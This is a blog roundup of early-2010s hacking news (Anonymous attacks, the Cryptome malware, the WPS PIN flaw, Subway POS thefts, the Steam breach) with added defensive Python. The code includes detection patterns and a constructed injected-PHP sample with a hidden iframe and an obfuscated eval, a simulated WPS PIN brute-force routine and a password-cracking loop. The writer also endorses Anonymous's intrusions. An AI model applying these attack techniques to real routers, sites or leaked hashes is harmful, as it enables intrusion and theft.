Anonymous Against FTC

Members of Anonymous’ “AntiSec” division attacked a Web server of the Federal Trade Commission’s Bureau of Consumer Protection, hacking into and defacing the sites hosted on it.

“The Bureau of Consumer Protection’s Business Center website and the partnership site NCPW run by the Federal Trade Commission were hacked earlier today,” FTC spokesperson Cecelia Prewett stated in an official statement. “The FTC takes these malicious acts seriously. The sites have been taken down and will be brought back up when we’re satisfied that any vulnerability has been addressed.”

A log of the hack, a cut-and-paste of a shell session on the compromised Red Hat Enterprise Linux server, was posted and spread widely. It shows the server’s directory listings, the user account names along with their password hashes, and the MySQL databases running on the server.

The websites belong to the FTC, but they weren’t running in a government-owned data center. According to the IP address data for the server, it was hosted by Media Temple in Culver City, California. The sites had been set up for the FTC by the public relations firm Fleishman-Hillard. Media Temple CMO Kim Brubeck said her company was unaware that Fleishman-Hillard intended to use servers in its data center for .gov sites, and that she has asked the firm to remove any other .gov sites.

According to the post, the attack was motivated by the FTC’s failure to step in and stop Google’s changes to its privacy policy, and by the US government’s support of ACTA. The member who posted the log threatened that “If ACTA is signed by all participating negotiating countries…We will systematically knock all evil corporations and governments off of our internet.” Since the United States is a free country and I am given the freedom of speech by the First Amendment, I will admit that I totally support Anonymous and what they stand for.

Source: Ars Technica

Cryptome Infecting Visitors

Breaches galore as Cryptome hacked to infect visitors with malware

A breach that caused Cryptome.org to serve malware to its visitors was one of at least six attacks reported against high-profile sites or services in the past few days. Other sites hit in the same stretch included Ticketmaster, websites for Mexico and the state of Alabama, Dutch ISP KPN, and the Microsoft store in India.

Cryptome is essentially an archive of leaked documents and other material concerning free speech, privacy and cryptography. Attackers planted code on its servers that tried to infect any visitor running Windows with a trojan delivered by the Blackhole exploit kit.

Cryptome’s founder John Young said he believes the attackers were able to plant a poisoned PHP file on the site by exploiting a weakness in the security or server software provided by Network Solutions, Cryptome’s hosting provider.

“It is not yet clear how the attacker got past Network Solutions (our ISP)’s security which has been pretty good,” Young wrote in an e-mail to Ars Technica. “A security expert sent a message just minutes ago which included a security scan of Cryptome which indicated the attacker likely knew how to bypass NetSol’s security with sophisticated tricks.”

According to security firm Symantec, the Blackhole kit exploits vulnerabilities in a variety of software that runs on Microsoft Windows (typically the browser and its plug-ins). The PHP code on Cryptome’s servers specifically declined to infect visitors coming from Google’s IP addresses, presumably so that Google’s crawlers would never see the payload and flag the site. Google’s Safe Browsing diagnostics for Cryptome showed no reports of compromise, which suggests the evasion worked.
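What a responder would do next is sweep the web root for the injected file. The scanner below is an added example written for this page; it is not Cryptome’s or Network Solutions’ code and not the actual payload. The indicator patterns, the two sample PHP files and the Google-looking IP prefixes inside them are constructed for illustration. It flags the classic tells (an obfuscated eval, a zero-sized iframe, a gate on REMOTE_ADDR) and pulls out the IP prefixes the gate excludes, which is exactly the evasion described above.

```python
"""Triage scanner for injected PHP droppers (added example, not Cryptome's code).
Indicator patterns are generic injection tradecraft chosen for this example;
the sample files below are constructed and do not reproduce the real payload."""
import re
import tempfile
from pathlib import Path

INDICATORS = {
    # eval() fed by a decoder is the classic way to hide a second-stage payload
    "obfuscated_eval": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # an iframe with width or height 0 loads a landing page the visitor never sees
    "hidden_iframe": re.compile(
        r"<iframe[^>]*\b(?:width|height)\s*=\s*['\"]?0\b", re.I),
    # branching on the client IP is how the payload is hidden from Google's crawlers
    "remote_addr_gate": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    # the user-agent variant of the same trick
    "crawler_ua_gate": re.compile(r"HTTP_USER_AGENT.{0,80}googlebot", re.I),
}
# quoted dotted-decimal literals such as '66.249.' (partial prefixes allowed)
IP_PREFIX = re.compile(r"['\"](\d{1,3}(?:\.\d{1,3}){1,3}\.?)['\"]")


def scan_text(text):
    """Sorted names of the indicators that fire on one file's contents."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def gated_ip_prefixes(text):
    """IP literals the code compares REMOTE_ADDR against, i.e. who the attacker hides from."""
    if not INDICATORS["remote_addr_gate"].search(text):
        return []
    return sorted(set(IP_PREFIX.findall(text)))


def scan_tree(root):
    """Map each .php file under root (relative path) to its indicators; clean files are omitted."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(errors="replace")
        found = scan_text(text)
        if found:
            hits[str(path.relative_to(root))] = {
                "indicators": found,
                "excluded_ips": gated_ip_prefixes(text),
            }
    return hits


# Constructed sample web root: one ordinary page and one page with an injected tail.
CLEAN_PHP = "<?php\n// ordinary page\necho '<h1>Archive</h1>';\n"
INJECTED_PHP = r"""<?php
$ip = $_SERVER['REMOTE_ADDR'];
if (strpos($ip, '66.249.') !== 0 && strpos($ip, '72.14.') !== 0) {
    echo '<iframe src="http://landing.invalid/x.php" width="0" height="0"></iframe>';
    eval(base64_decode('ZWNobyAiIjs='));
}
"""


def build_sample_site():
    """Write the constructed two-file web root into a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "index.php").write_text(CLEAN_PHP)
    (root / "inc").mkdir()
    (root / "inc" / "footer.php").write_text(INJECTED_PHP)
    return root


if __name__ == "__main__":
    for rel, info in scan_tree(build_sample_site()).items():
        print(rel, info)
```

Point it at a real document root with scan_tree("/var/www") and treat the output as a triage list, not a verdict: a legitimate page that reads REMOTE_ADDR for logging will also trip the gate indicator, so the combination of indicators (and the excluded prefixes) is what tells an injected file apart.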

 

Source: Ars Technica

Anonymous Against DoJ

Anonymous is back, and this time they have launched a pair of operations. The first is a response to the takedown of the Megaupload.com site by the FBI and other authorities. The second continues the protest against the Stop Online Piracy Act (SOPA), this time targeting the members of Congress who support it. So far, the sites of the Justice Department, Universal Music Group, and several congressional sites have been affected.

The attacks began as Anonymous’ Sabu called for people to boycott paid media in all forms and to promote torrent and file sharing sites. “This new, massive operation, will target on SOPA/PIPA in a way that the government was not expecting,” he posted on Twitter. “We are going to starve the beast.” In response to the arrest of Megaupload.com’s founders, he said, “This is the governments way of saying: ‘How nice of you to protest SOPA/PIPA. But we still are in control.’ Fuck this.”

The Department of Justice and Universal Music sites were both knocked offline by denial-of-service attacks. Anonymous’ Barrett Brown told RT.com that “It was in retaliation for Megaupload, as was the concurrent attack on Justice.org.” Both sites remained down for quite some time, and attacks continued for a few days. Anonymous members have also targeted the sites of the Motion Picture Association of America and the White House, as well as other government sites.

In a wave of attacks labelled “OpDonkeyPunch” by Barrett Brown, a frequent spokesperson for Anonymous, the group is targeting Democrats in Congress who support SOPA, going directly after their websites. Brown also published the fax number of Republican Rep. Lamar Smith, the sponsor of SOPA.

In an e-mail, Brown stated that the intention of OpDonkeyPunch “is to show Democrats that they can’t just slide through on this and escape notice, that we can do more damage to their fundraising ability than they realize.” Anonymous has also extended its efforts to the Facebook and Twitter accounts of SOPA supporters. They are not hacking those accounts, since they don’t want the sites shut down; instead, Anonymous is flooding the supporters’ messages, walls and feeds with spam.

Source: Ars Technica

Published Tool for Hacking WiFi Protected Setup

Researchers publish open-source tool for hacking WiFi Protected Setup

A flaw in WiFi Protected Setup means most home and small-business routers could be handing out their WPA/WPA2 passphrase, and with it free WiFi, to anyone within radio range.

On December 27th, the Department of Homeland Security’s US Computer Emergency Readiness Team (US-CERT; what a mouthful, or handful if you’re typing :P ) issued a warning, VU#723755, about a vulnerability in wireless routers that use WPS, or WiFi Protected Setup, to let new devices join the network. Just a day after the warning was issued, researchers at a Maryland-based computer security firm, Tactical Network Solutions, released a tool called Reaver that exploits the vulnerability, and went so far as to make a version available as open source.

WPS is designed so that home and small-business users can add devices to a wireless network without typing a long passphrase: the registration is done automatically to save time. Many WPS-capable routers authenticate a new device with a personal identification number (PIN) printed on the router itself.

However, security researcher Stefan Viehböck found that the PIN exchange is susceptible to brute-force attacks because of the way routers respond to bad guesses and because of the structure of the PIN itself. The short version: the eighth digit of the PIN is a checksum of the first seven, and the router reveals whether the first four digits are right before the last three are ever checked, so the two halves can be guessed independently. Instead of up to ten million guesses, an attacker needs at most 10,000 + 1,000 = 11,000, and with a tool that automates the guessing that becomes a few hours’ work. Viehböck demonstrated the vulnerability with a proof-of-concept tool he wrote in Python, available for download from his site.
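To see why the number is 11,000 rather than ten million, here is a simulation added for this page (it is not Viehböck’s proof of concept and not Reaver). The registrar model is an assumption that encodes the behaviour described above: the access point answers with an EAP-NACK after message M4 when the first four digits are wrong, and only after M6 when the last three are wrong, and the eighth digit is a checksum the attacker can compute for free. The secret PIN 12345670 is simply one PIN with a valid checksum.

```python
"""WPS PIN search space, as an added simulation (not Viehböck's tool or Reaver).
The RegistrarOracle is an assumption modelling the protocol leak described in
the text: NACK after M4 = first half wrong, NACK after M6 = second half wrong."""


def wps_checksum(first_seven):
    """Checksum digit of a WPS PIN: odd positions weighted 3, even positions 1."""
    digits = [int(c) for c in first_seven]
    acc = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - acc % 10) % 10


def valid_pin(pin):
    """True when pin is eight digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class RegistrarOracle:
    """Models an access point that tells the client where a bad PIN failed."""

    def __init__(self, secret_pin):
        if not valid_pin(secret_pin):
            raise ValueError("secret PIN has a bad checksum")
        self.secret = secret_pin
        self.attempts = 0

    def try_pin(self, guess):
        self.attempts += 1
        if guess[:4] != self.secret[:4]:
            return "NACK@M4"        # first half wrong: rejected before M5/M6
        if guess[4:] != self.secret[4:]:
            return "NACK@M6"        # first half right, second half wrong
        return "OK@M7"              # PIN accepted; M7 would carry the WPA passphrase


def brute_force(oracle):
    """Exploit the split: find the first four digits, then the last three.
    Worst case is 10,000 + 1,000 attempts; the checksum digit is computed, never guessed."""
    first_half = None
    for a in range(10_000):
        if oracle.try_pin(f"{a:04d}0000") != "NACK@M4":
            first_half = f"{a:04d}"
            break
    for b in range(1_000):
        tail = f"{b:03d}"
        guess = first_half + tail + str(wps_checksum(first_half + tail))
        if oracle.try_pin(guess) == "OK@M7":
            return guess, oracle.attempts
    return None, oracle.attempts


if __name__ == "__main__":
    oracle = RegistrarOracle("12345670")
    pin, attempts = brute_force(oracle)
    print(f"recovered PIN {pin} after {attempts} attempts (worst case 11000)")
```

Without the split, an attacker who knew only the checksum rule would face 10^7 candidate PINs; the oracle’s two-stage answer is the whole vulnerability, which is why a lockout after a handful of bad attempts (or disabling WPS) is the fix rather than a longer PIN.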

Why is that bad? Well, if you have a WPS-enabled router, changing the passphrase or service set identifier (SSID) won’t keep these attackers out: the PIN hands over the current WPA passphrase, and since the PIN itself cannot be changed, the attacker can simply recover the new passphrase the same way. Hell, if you’re running multiple SSIDs with different passwords, the one PIN can provide access to all of them.

The routers most exposed to these attacks are the ones without a PIN lockout feature that stops a client after a number of bad guesses; they include products from Cisco’s Linksys division, Belkin, Buffalo, Netgear, TP-Link, ZyXEL, and Technicolor. None of the vendors had issued a statement on the vulnerability or replied to Viehböck’s inquiries. The practical fix is to disable WPS entirely, and then to check that the router has actually stopped responding to WPS requests, since some models have been found to keep answering them even after WPS is switched off in the settings.

Source: Ars Technica

Subway’s $3 Million Hack

How hackers gave Subway a $3 million lesson in point-of-sale security

A band of Romanian hackers stole credit card data from hundreds of small businesses, including more than 150 Subway restaurant franchises and at least 50 other small retailers. The businesses’ point-of-sale (POS) systems were so poorly secured that, so to speak, the cash drawers were left open, letting the hackers ring up over $3 million in fraudulent charges.

How many victims were there? According to an indictment unsealed in the US District Court of New Hampshire on December 8th, the hackers are alleged to have harvested credit and debit card data from over 80,000 victims. “This is the crime of the future,” said Dave Marcus, director of security research and communications at McAfee Labs. Robbery at gunpoint is giving way to criminals targeting small businesses digitally.

While hacking may seem complex, the methods these attackers used were unsophisticated. They found their targets with a port scan across blocks of IP addresses, looking for systems running a specific type of remote desktop access software; that told them which machines were POS systems, and the same software gave them a way in. The PCI Security Standards Council, which governs the security of credit and debit card payment systems, requires two-factor authentication for remote access to POS systems, which the hacked retailers obviously didn’t have.

“With PCI compliance, those apps shouldn’t be on those systems,” said Konrad Fellmann, audit and compliance manager for SecureState, an IT security firm with a practice in retail security auditing. But small retailers who don’t store credit card data are not required to have the same level of auditing as larger companies, Fellmann said.

Subway is the main company in question; the rest were primarily small businesses. Subway provided requirements to its franchises, but some of them “directly and blatantly disregarded” Subway’s security and POS configuration standards. “It’s not like they had to install something and they didn’t,” Schuman said. “They did it proactively,” he continued, “downloading low-cost remote desktop software from the Internet and refusing to use point-to-point encryption as Subway dictated.”

The Justice Department alleges that the hackers got into the remote desktop software by guessing or “cracking” its passwords. Fellmann isn’t surprised, based on his experience with retailers: weak passwords such as “password” or “1234” are among the most common findings in his POS penetration tests. “Some people, you tell them what’s required, and they’d rather not do it. They had the tools, and could have easily blocked [the attack]. If they were using a validated POS application, the vendor should provide an implementation plan, which would have included making sure you have a firewall in place.” But, he said, “these people weren’t thinking about point of sale security – they were just thinking about making a sandwich.”
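The sequence the indictment describes (scan for exposed remote desktop software, then guess its password) leaves a loud trail in authentication logs. The detector below is an added example for this page, not code from the case or from any of the firms quoted; the log format, host names, user names and IP addresses are constructed. It flags a source that racks up repeated failures against one host inside a short window, and escalates the finding when that same source later logs in successfully, which is the moment the password was guessed.

```python
"""Password-guessing detector for remote-desktop logins (added example; the log
format and every address, host and user name below are constructed, not from the case)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample: one external source guesses its way into pos-07, a second
# external source gives up early, and a staff login from the LAN is normal.
SAMPLE_LOG = """\
2011-03-04T02:13:01Z host=pos-07 src=203.0.113.45 user=admin result=FAIL
2011-03-04T02:13:09Z host=pos-07 src=203.0.113.45 user=admin result=FAIL
2011-03-04T02:13:17Z host=pos-07 src=203.0.113.45 user=Administrator result=FAIL
2011-03-04T02:13:26Z host=pos-07 src=203.0.113.45 user=Administrator result=FAIL
2011-03-04T02:13:33Z host=pos-07 src=203.0.113.45 user=pos result=FAIL
2011-03-04T02:13:41Z host=pos-07 src=203.0.113.45 user=pos result=FAIL
2011-03-04T02:13:50Z host=pos-07 src=203.0.113.45 user=pos result=FAIL
2011-03-04T02:14:02Z host=pos-07 src=203.0.113.45 user=pos result=SUCCESS
2011-03-04T03:40:10Z host=pos-07 src=198.51.100.9 user=admin result=FAIL
2011-03-04T03:40:30Z host=pos-07 src=198.51.100.9 user=admin result=FAIL
2011-03-04T03:41:05Z host=pos-07 src=198.51.100.9 user=root result=FAIL
2011-03-04T09:00:00Z host=pos-07 src=10.0.0.5 user=pos result=SUCCESS
"""


def parse_line(line):
    """'<iso-timestamp> key=value ...' -> dict with a tz-aware datetime under 'ts'."""
    ts, *kv = line.split()
    ev = dict(item.split("=", 1) for item in kv)
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def detect_guessing(lines, threshold=5, window=timedelta(minutes=10)):
    """Flag (src, host) pairs with >= threshold failed logins inside `window`;
    mark the finding 'guessed' if the same source then logs in successfully."""
    recent_fails = defaultdict(deque)   # (src, host) -> timestamps of failures in window
    users_tried = defaultdict(set)      # (src, host) -> account names attempted
    findings = {}
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    for ev in events:
        key = (ev["src"], ev["host"])
        if ev["result"] == "FAIL":
            q = recent_fails[key]
            q.append(ev["ts"])
            users_tried[key].add(ev["user"])
            while q and ev["ts"] - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(key, {"src": ev["src"], "host": ev["host"],
                                              "first_fail": q[0], "outcome": "ongoing"})
                f["failures"] = len(q)
                f["last_fail"] = ev["ts"]
                f["users_tried"] = sorted(users_tried[key])
        elif ev["result"] == "SUCCESS" and key in findings:
            findings[key]["outcome"] = "guessed"    # the credential fell
            findings[key]["account"] = ev["user"]
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_guessing(SAMPLE_LOG.splitlines()):
        print(f"{f['src']} -> {f['host']}: {f['failures']} failures, "
              f"tried {f['users_tried']}, outcome={f['outcome']}")
```

The threshold and window are the knobs to tune per environment; the stronger signal is the failure-then-success pattern from an address outside the store’s own network, which is the same event a two-factor requirement for remote access would have stopped.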

Source: Ars Technica

Anonymous Exposes Gmail of Cybercrime Investigator

On Friday, Anonymous’ Operation AntiSec published the private e-mails of a California Department of Justice investigator. The hackers have posted the 38,000 e-mails in a Gmail account that appears to belong to Alfredo “Fred” Baclagan, a California Department of Justice special agent supervisor in charge of computer crime investigations. They published these to a hidden site on Tor, as well as to a torrent listed on The Pirate Bay. They have also included Baclagan’s personal address and phone number.

Anonymous’ effort is part of its attack on law enforcement in response to police activities surrounding the Occupy Wall Street protests. It began as a protest by Anonymous and LulzSec against government monitoring and censorship of the Internet. While LulzSec has gone dark again, Anonymous has kept going for years.

In a Twitter message, Anonymous said that their attacks on law enforcement also “has to do with FBI’s targeting of anons, re: imprisoned during opPayback and others.” Operation Payback included the DDoS attacks on Visa, Mastercard, and PayPal after they cut off contribution processing to WikiLeaks.

The e-mails posted by Anonymous include archives of the International Association of Computer Investigative Specialists’ private mailing list, where members discussed computer forensic methods. Also included are IACIS members’ reactions to threads from the list being posted to the Twitter account of Sabu, a well-known Anonymous hacker, and an e-mail sent from Baclagan’s hacked Google account that rickrolled the entire list. The IACIS site is down “for maintenance” because of the disclosures.

Anons also claimed to have listened to Baclagan’s personal voicemails and read his SMS logs, as well as his personal Google Voice account. They said they used the Google Voice account to text and call his friends and family.

“We lulzed as we listened to angry voicemails from his estranged wives and ex-girlfriends while also reading his conversations with girls who responded to his ‘man seeking woman’ craigslist ads,” the hackers wrote in their post.

Source: Ars Technica

Romanian Hacker Arrested

A 26-year-old Romanian hacker, Robert Butyka, has been arrested for breaking into computer systems at NASA, according to a release from the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT). He is charged with breaking into NASA servers starting in December 2010.

For some reason, Romanians seem to target NASA. I don’t know if they’re looking for something, if NASA is easy to hack, or if they simply dislike NASA. Whatever the case may be, this is the third time in a few years that a Romanian has hacked NASA: Butyka, TinKode, and Victor Faur. TinKode stole satellite data in May 2011. Faur hacked NASA and US Navy sites in 2005 and 2006 and was charged in 2008; he avoided jail but ended up paying $238,000 in damages to the United States.

Romania itself is pressing charges against Butyka, as there is no extradition treaty between Romania and the United States; he did, however, violate Romania’s anti-hacking laws. DIICOT says he caused over $500,000 in damage to NASA systems through “introduction, modification and damage to computer data, and restricting access to data.”

Source: Ars Technica

Steam Was Hacked: Confirmed by Valve


Valve’s Steam has been hacked, and with it comes the possible compromise of users’ credit card numbers and personal information. Gabe Newell, head of Valve, confirmed the intrusion. The attackers gained access to a database holding salted password hashes and encrypted credit card data, but Valve isn’t sure whether the attackers took the information, or whether they would even be able to get past the encryption.

Earlier in the week, Steam took its forums down after they were defaced with links to the game-cheating site fkn0wned. A notice said the forums were down for maintenance, but Valve has since made clear that it had some unexpected guests in the forums and the database.

What was stored in the hacked database? User names, passwords, game purchases, e-mail addresses, billing addresses and credit card information, according to Newell. He also stated that Valve has no evidence that the encrypted credit card numbers or personal information were taken, and the company is conducting a full investigation. There have been no reports or evidence of credit card misuse, but Steam users are told to “watch your credit card activity and statements closely.”

The full text of Newell’s message:

Dear Steam Users and Steam Forum Users,

Our Steam forums were defaced on the evening of Sunday, November 6. We began investigating and found that the intrusion goes beyond the Steam forums.

We learned that intruders obtained access to a Steam database in addition to the forums. This database contained information including user names, hashed and salted passwords, game purchases, email addresses, billing addresses and encrypted credit card information. We do not have evidence that encrypted credit card numbers or personally identifying information were taken by the intruders, or that the protection on credit card numbers or passwords was cracked. We are still investigating.

We don’t have evidence of credit card misuse at this time. Nonetheless you should watch your credit card activity and statements closely.

While we only know of a few forum accounts that have been compromised, all forum users will be required to change their passwords the next time they login. If you have used your Steam forum password on other accounts you should change those passwords as well.

We do not know of any compromised Steam accounts, so we are not planning to force a change of Steam account passwords (which are separate from forum passwords). However, it wouldn’t be a bad idea to change that as well, especially if it is the same as your Steam forum account password.

We will reopen the forums as soon as we can.

I am truly sorry this happened, and I apologize for the inconvenience.

Gabe.
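Newell’s letter says the passwords were “hashed and salted” and asks users to change any password reused elsewhere. The example below, added here and not Valve’s code, shows what that buys and what it doesn’t: per-user salts mean two users with the same password get unrelated records (so one cracked hash reveals nothing about the others and precomputed tables are useless), but a weak or reused password still falls to offline guessing, just one slow PBKDF2 run at a time. The record format and the iteration count are assumptions for this example.

```python
"""Salted password hashing, verification and offline guessing (added example,
not Valve's code). Record format and cost parameter are assumptions."""
import hashlib
import hmac
import os

ITERATIONS = 100_000   # assumption: raise as hardware gets faster


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, record):
    """Recompute with the stored salt and cost; compare in constant time."""
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record type {algo!r}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def unsalted_sha1(password):
    """The anti-pattern: identical passwords hash identically, and a rainbow
    table for SHA-1 cracks every user at once."""
    return hashlib.sha1(password.encode()).hexdigest()


def crack(records, wordlist):
    """Offline guessing against leaked records. Salting does not stop this;
    it only forces a full PBKDF2 run per (record, guess) pair and prevents
    one guess from being checked against every record at once."""
    found = {}
    for user, record in records.items():
        for guess in wordlist:
            if verify_password(guess, record):
                found[user] = guess
                break
    return found


if __name__ == "__main__":
    # constructed leaked table: alice reused a password from an older breach
    leaked = {"alice": hash_password("hunter2"),
              "bob": hash_password("correct horse battery staple")}
    print("alice and bob records differ even if passwords matched:", leaked["alice"][:40])
    print("cracked with a tiny wordlist:", crack(leaked, ["password", "hunter2"]))
```

The design point is the split between what the salt protects (cross-user correlation and precomputation) and what only the user controls (password strength and reuse), which is exactly why the letter tells forum users to rotate any password they used on another site.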

Source: Ars Technica

Hackers Control Prison Cell Doors

There is quite the vulnerability in the computer systems used to control facilities at federal prisons. In what seems straight out of a movie, the exploit could allow a capable hacker to remotely take over a prison: open and overload cell door mechanisms and shut down the internal communications systems. Tiffany Rad, Teague Newman, and John Strauchs presented the work on October 26 at the Hacker Halted information security conference in Miami. The three spent less than $2,500 and had no previous experience with prison technologies.

The Washington Times reported that the researchers delivered their findings to state and federal prison authorities. The Department of Homeland Security even confirmed their research. “We validated the researchers’ initial assertion… that they could remotely reprogram and manipulate [the ICS software and controllers],” Former National Cybersecurity and Communications Integration Center Director Sean P. McGurk, who left DHS in September, told the Washington Times.

Strauchs was called in by a warden to investigate an incident in which “all the cell doors on one prison’s death row spontaneously opened.” While the computers that control the doors and other systems should not be connected to the Internet, the researchers found an Internet connection associated with every prison system they looked at: sometimes staff used the machines to surf the Internet, other times vendors had installed software for remote maintenance. For a facility with no Internet connection, a USB flash drive attack could be used instead.

“You could open every cell door, and the system would be telling the control room they are all closed,” Strauchs, a former CIA operations officer, told the Times. He said that he thought the greatest threat was that the system would “be used to create the conditions needed for the assassination of a target prisoner.”

Source: Ars Technica

Anonymous Publishes IP Addresses of Pedophiles

Anon holding up a "Pedobear"

While we knew that Anonymous took down a Tor-based child pornography host, and many had mixed feelings about whether that was right or wrong, Anonymous has once again declared itself “successful.” Police and FBI officials had criticized the actions of Anonymous because they “interfered with possible ongoing investigations.” Now the Anon “hacktivist” group has published the IP addresses of 190 alleged pedophiles that it found on its own. The group says it teamed up with members of the Mozilla (Firefox) Foundation to create a Tor browser plugin that collected “forensic data about the users.” Members of the group also claim that a member of Tor’s developer team operates the hosting service that serves up “several child pornography sites.”

How does the Tor network work? It’s all about privacy. It lets users browse the Internet anonymously and reach hidden “.onion” sites that are not visible on the wider Internet. Tor can be used for many different things, so it is not a bad thing in itself, but it can be abused. Attacks can still get through the privacy network, for example by “fingerprinting” users to learn information about them.

Why couldn’t law enforcement agencies, or even the FBI, get this information? Tor had just shipped a security update that closed a number of vulnerabilities, and those agencies cannot simply collect such data without probable cause and all that other legal nonsense. Anonymous is under no such constraint. The group says the update made it possible to identify users by the certificate they used, and so to find their locations; it used the update as a lure and, through social engineering, got the pedophiles to install an altered version of the Tor software so that it could collect “forensic” information on them. The OpDarkNet team of Anonymous has been conducting DDoS (distributed denial of service) attacks on child pornography sites for over a month.

“One week prior to October 27th, 2011,” the OpDarkNet wrote in a statement, “We […] performed ‘Operations Security’ against the developers of Tor. We quietly listened on irc.oftc.net channels #tor and #tor-dev to find when the next major release of Tor would be.”

After Anonymous learned the date of the scheduled security update, October 27th, they “secretly contacted our friends at The Mozilla Foundation, Developers of Firefox, for them to authorize a developer signer certificate for ‘The Honey Pawt’, a TorButton that we Anon created to funnel all originating traffic to our forensic logger.” Mozilla approved the plugin on October 26th, the group says. “Our TorButton aka “The Honey Pawt” did not contain any malware or virus. It was developed according to the Firefox/Mozilla Foundation guidelines,” the group claimed.

Mozilla denied that very same thing. Mozilla’s Justin Scott said, “I’ve checked in with the add-ons team over here and no one at Mozilla was contacted by Anonymous in an official capacity. We also do not issue certificates for add-ons.” The “Honey Pawt” add-on isn’t in the Mozilla add-ons marketplace, he added, and “all add-ons available in the marketplace have been reviewed by a member of the add-ons team per the review process.”

Either way, the add-on was made available somewhere. On October 27th, Anonymous paused its DDoS attacks on the two main sites and posted a message on the “Hard Candy” child-porn directory about the Tor security update, linking to the plugin download. Once the plugin had been downloaded, the hackers collected data for 24 hours and then resumed their DDoS attacks.

The IP addresses they collected come from all around the world; the ISPs include NTT, Sprint, British Telecom, and many others. Really, they help more than people are letting on. No charges can be pressed on this alone, as there is no way to take the word of the biggest hacking group in the world, whether they claim to be good or bad (though I believe them to be good in nature). However, it gives law enforcement agencies, the FBI, and even the CIA a place to look and people to investigate. Anonymous claims to have 1,500 IP addresses.

Anonymous also claims to have discovered the identity of the operator of Freedom Hosting. The hackers have accused privacy advocate Mike Perry—developer of the TorFlow network monitoring tool and the Torbutton Firefox plugin—of operating the host through a “shell company” called Formless Networking LLC.  Perry has denied the claims at length in his blog.  “I seem to be the target of a vigilante lynch mob (or a subset of one),” he wrote, “who will not dispose themselves of the notion that I run a service called Freedom Hosting (despite having evidence in their possession to the contrary). I am not sure exactly why they are targeting me, but I strongly suspect it is meant as a distraction campaign at a key time in Tor’s funding and development cycle.”

As I stated before, this can neither be proven nor disproven at this time based solely on the word of the biggest hacking group in the world. Still, it’s a starting point. Will Anonymous be able to team up with the FBI or CIA? Will all of their previous “illegal” actions be overlooked for now to help take down pedophiles, which could reduce kidnappings, child molestation, and child pornography? It is doubtful, but it sure is quite the thought.

Source: Ars Technica